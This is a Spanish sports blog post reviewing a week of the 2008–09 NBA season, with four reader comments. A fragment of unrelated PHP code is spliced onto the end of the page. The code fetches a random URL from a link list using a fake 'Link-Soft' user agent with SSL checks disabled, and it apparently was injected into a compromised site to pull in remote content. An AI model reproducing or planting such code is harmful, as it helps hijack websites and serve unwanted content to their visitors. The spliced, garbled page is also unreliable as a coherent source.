INFORME SEMANAL TJNBA (Semana 17)

23 de February de 2009 por TheDeerHunter

Repasamos lo ocurrido en la competición durante estas dos semanas atípicas interrumpidas por el All-Star.

jazzceltsON-FIRE

El gran triunfador de estas fechas ha sido, sin lugar a dudas, Utah. No sólo hablamos de haberles dado pal pelo a Lakers, Celtics o New Orleans, de haber recuperado parte de su crédito con la mejor versión de Deron, la peor del temido “infierno” y a jugadores clave para la causa como Kirilenko u Okur. Hablamos de que los astros parecen haberse confabulado para que todos sus rivales directos atraviesen al mismo tiempo problemas de diversa índole, de forma que tras todo lo que han sufrido ahora mismo aparentan ser, de entre todos ellos, el equipo más solvente para quedarse alguna de esas plazas de postemporada que van a salir tan caras en el Oeste.

odomwarriorsEn esta tesitura, es justificable haber caído en Salt Lake, como lo hicieron los Lakers. Con todo, son el equipo que más victorias ha logrado en estas dos medio-semanas. Odom, mejor que nunca… y subiendo. Los Celtics también tropezaron allí pero terminan con un 3-1 sin Garnett durante dos partidos y con exhibición de Rondo ante Nash. No está mal.

Cleveland, Portland y Houston también han obtenido la nada desdeñable marca de 4-1, que ya hubieran querido para sí el resto de la liga. Llama particularmente la atención el caso de Houston: fue confirmar la baja definitiva de McGrady y empezar a carburar. Será casualidad, pero son ese tipo de detalles las que le dan tan mala fama al bueno de T-Mac.

Dentro de este grupo, por fuerza, debemos de incluir a Milwaukee. Plagados de bajas, ahí los tenemos, defendiendo como jabatos su plaza de Playoffs. Ya tendrían que aprender de ellos otros equipos sobre el papel muy superiores.

AL TRAN TRAN

Los Pacers también andan, como muchos otros, con problemas de lesiones. En su caso, la pelea es por prolongar sus esperanzas por meterse en la pomada. A su favor hay que decir que desde principio de año llevan un 50% que sería suficiente de no haber empezado tan sumamente mal; en su contra, que siguen perdiendo partidos que no deberían perder. Pues eso… más “al tran tran”, imposible. En ello están: esta semana victoria contra Cleveland y derrota contra Charlotte.

Sin pena ni gloria se han mantenido la zona noble de la liga estos días. Ilustres como Orlando, San Antonio, Atlanta, Denver o Dallas se quedan con un 3-2 que no está mal para ir, pasito a paso, pistonsbenchasegurándose sus objetivos, pero no les da para subir más de lo que están o incluso, en algún caso, les da para verse amenazados por sus respectivos perseguidores. Creemos que estos equipos tienen para bastante más, pero obviamente siempre es mejor su caso que el de otros, que ni siquiera han llegado al .50 y se mantienen en tierra de nadie. Es el caso de Miami o de Philadelphia.

Por último, Chicago también ha dado un paso adelante en su carrera particular, todo a expensas de ir incorporando sus acertados refuerzos, y los Warriors han logrado un meritorio 3-1 que en realidad no les sirve para nada. Lástima de accidente de motocicleta.

EL BORDE DEL ABISMO

Cero pelotero. Es el balance de los Pistons. Y, cómo no, ya se habla de importantes problemas en el vestuario. El colchón que tenían empieza a desinflarse.

Más o menos en la misma tesitura se encuentran Hornets y Suns, con varios agravantes con nombre propio. El caso Chandler y el caso Stoudemire ponen a ambos contra las cuerdas.

marionboshEn el Este hay algún equipo que parece no querer postemporada ni con plaza regalada. New York o Charlotte no son capaces de sacar ventaja de lo barato que va el pescado en su conferencia.

EL POZO

Lástima de Nets, que habían logrado ganarse parte de nuestros corazoncitos al principio. 0-4 esta semana, jugándose lo que se juegan.

Toronto y Calderón parecen que quieren salir del pozo con la incorporación de Marion, pero la distancia hasta la superficie es demasiado larga. No lo conseguirán.

El resto de parroquianos de esta categoría siguen a lo suyo. No tengo ganas ni de mentar sus nombres. Consultad el informe anterior, si tenéis alguna duda.

Comenta

4 comentarios a esta entrada

  1. Jabho dice:
    #1

    Pues no, Toronto no lo conseguirá y Bosh parece haber tirado la toalla. Complicado el panorama. Al menos el cambio de Marion les da cierta flexibilidad cara al año que viene… cierta.

    Ojito con Porland que se mantiene muy regular y van a dar sustos en PO a más de uno.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Pues sí,,,o no. Penica lo de Bosh,,que parecia que se iba a comer medio mundo, y parece que se deja llevar un poco.

      Citar

  3. Viva_Dirk dice:
    #3

    Estoy con Mordaunt, Portland salvo a Lakers creo que puede ganar una eliminatoria a 7 partidos a cualquiera.

    Hasta el final de la regular si los Clippers se mantienen sin lesiones creo que van a dar unos cuantos sustos y Eric Gordon puede estar peleando por el rookie del año.

      Citar

  4. MagicJohnson32 dice:
    #4

    Pues a mí en el Oeste me sorprendería mucho cualquier final que no fuese Lakers-Spurs (y victoria laker). Aunque por debajo de éstos, sí veo muchísima igualdad.

    Como Viva, creo que los Clippers pueden convertirse en un rival peligroso en lo que queda de año, aunque para ello necesitan un poco de salud. El equipo debería tomarse en serio lo que queda de temporada por mucho que estén hundidos, porque les puede servir para probar las posibilidades de un equipo Baron-Eric-Thornton-Zach-Camby + Kaman. Así, si no funciona tendrían el verano para solucionarlo, y se evitarían echar por tierra no sólo esta sino también la próxima temporada.

    Por cierto, Pau y Dwight jugadores de la semana. El de Pau es el segundo consecutivo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>